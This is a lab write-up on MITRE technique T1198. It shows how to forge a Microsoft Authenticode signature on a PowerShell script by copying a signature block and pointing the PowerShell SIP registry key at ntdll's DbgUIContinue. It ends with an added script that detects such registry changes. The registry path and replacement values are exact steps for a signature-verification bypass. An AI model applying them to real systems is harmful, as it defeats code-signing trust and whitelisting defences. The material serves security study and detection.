---
description: Defense Evasion, Persistence, Whitelisting Bypass
---

T1198: SIP & Trust Provider Hijacking

In this lab, I will try to sign a simple "rogue" PowerShell script, test-forged.ps1, which contains only one line of code, with Microsoft's certificate, and thereby bypass any whitelisting protections/policies the script would be subject to if it were not signed.

Execution

The script that I will try to sign:

Just before I start, let's make sure that the script is not signed, using the Get-AuthenticodeSignature cmdlet and Sysinternals sigcheck:

In order to sign the script with Microsoft's certificate, we first need to find a native Microsoft-signed PowerShell script. I used PowerShell for this:

```powershell
Get-ChildItem -Path C:\*.ps* -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "# SIG # Begin signature block"
```

I chose one script at random and simply checked if it was signed - luckily it was:

```
type C:\Windows\WinSxS\x86_microsoft-windows-m..ell-cmdlets-modules_31bf3856ad364e35_10.0.16299.15_none_c7c20f51cd336675\Wdac.psd1
```

Let's copy the Microsoft signature block to my script:

Now let's modify the registry at:

```
HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
```

From:

To:

{% code title="DLL" %}
```
C:\Windows\System32\ntdll.dll
```
{% endcode %}

{% code title="FuncName" %}
```
DbgUIContinue
```
{% endcode %}

Now, let's launch a new PowerShell instance (so that the registry changes take effect) and check the signature of the forged script. Note how it now shows as signed, verified and valid: the PowerShell SIP's hash-verification routine has been replaced by ntdll's DbgUIContinue, which always reports success, so the copied Microsoft signature block is accepted even though its hash does not match the script:

Observations

Monitoring the following registry keys/values helps discover this suspicious activity:
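As an added example (not part of the original lab), the following PowerShell script snapshots every Dll/FuncName pair registered under the CryptSIPDll* keys and later diffs the live registry against that snapshot. The lab's change above would surface as a CHANGED entry for {603BCC1F-4B59-4E08-B724-D2C6297EF351}. The baseline file location is an assumption; the legitimate values to expect are listed in the whitepaper referenced below.

```powershell
# Added example (not part of the original lab). Snapshot the SIP
# registrations T1198 tampers with, then diff later runs against it.
param(
    [ValidateSet('Baseline', 'Compare')][string]$Mode = 'Compare',
    [string]$BaselinePath = "$env:ProgramData\sip-baseline.json"  # assumed path
)
# 64-bit and 32-bit (WOW6432Node) SIP roots. Each CryptSIPDll* subkey holds
# one {GUID} key per file type, with the Dll and FuncName that verify it.
$roots = @(
    'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0'
)

function Get-SipRegistration {
    foreach ($root in $roots) {
        Get-ChildItem -Path $root -ErrorAction SilentlyContinue |
            Where-Object { $_.PSChildName -like 'CryptSIPDll*' } |
            Get-ChildItem -ErrorAction SilentlyContinue |
            ForEach-Object {
                $p = Get-ItemProperty -Path $_.PSPath
                [pscustomobject]@{
                    Key      = $_.Name
                    Dll      = [string]$p.Dll
                    FuncName = [string]$p.FuncName
                }
            }
    }
}

$current = @(Get-SipRegistration)
if ($Mode -eq 'Baseline') {
    # Record the known-good state once, on a host you trust.
    $current | ConvertTo-Json -Depth 3 | Set-Content -Path $BaselinePath
    Write-Output "Wrote $($current.Count) SIP registrations to $BaselinePath"
    return
}

# Compare mode: index the baseline by key and report new or altered entries.
$baseline = @{}
foreach ($b in (Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json)) {
    $baseline[$b.Key] = $b
}
foreach ($c in $current) {
    $b = $baseline[$c.Key]
    if (-not $b) {
        Write-Warning "NEW SIP registration: $($c.Key) -> $($c.Dll)!$($c.FuncName)"
    } elseif ($b.Dll -ne $c.Dll -or $b.FuncName -ne $c.FuncName) {
        Write-Warning "CHANGED $($c.Key): $($b.Dll)!$($b.FuncName) -> $($c.Dll)!$($c.FuncName)"
    }
}
```

Run it once with `-Mode Baseline` on a clean host and then on a schedule with `-Mode Compare`; a Dll pointing outside the expected SIP module (here, ntdll.dll) is the signal to investigate.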

References

For all the registry keys/values that should be used as a baseline, please refer to the original research whitepaper by Matt Graeber:
SpecterOps, Subverting Trust in Windows

{% embed url="https://attack.mitre.org/wiki/Technique/T1198" %}

{% embed url="https://www.youtube.com/watch?v=wxmxxgL6Nz8" %}

{% embed url="https://pentestlab.blog/2017/11/06/hijacking-digital-signatures/" %}

{% embed url="http://ultimate-sysadmin-fanboy.blogspot.com/2015/06/unable-to-renew-certificate-via.html" %}

{% embed url="https://blogs.msdn.microsoft.com/sqlforum/2011/01/02/walkthrough-request-a-digital-certificate-from-certificate-server-or-create-a-testing-digital-certificate-to-sign-a-package/" %}

{% embed url="https://www.youtube.com/watch?v=WrHTJQovDoY" %}

{% embed url="https://www.hanselman.com/blog/SigningPowerShellScripts.aspx" %}

{% embed url="https://github.com/netbiosX/Digital-Signature-Hijack" %}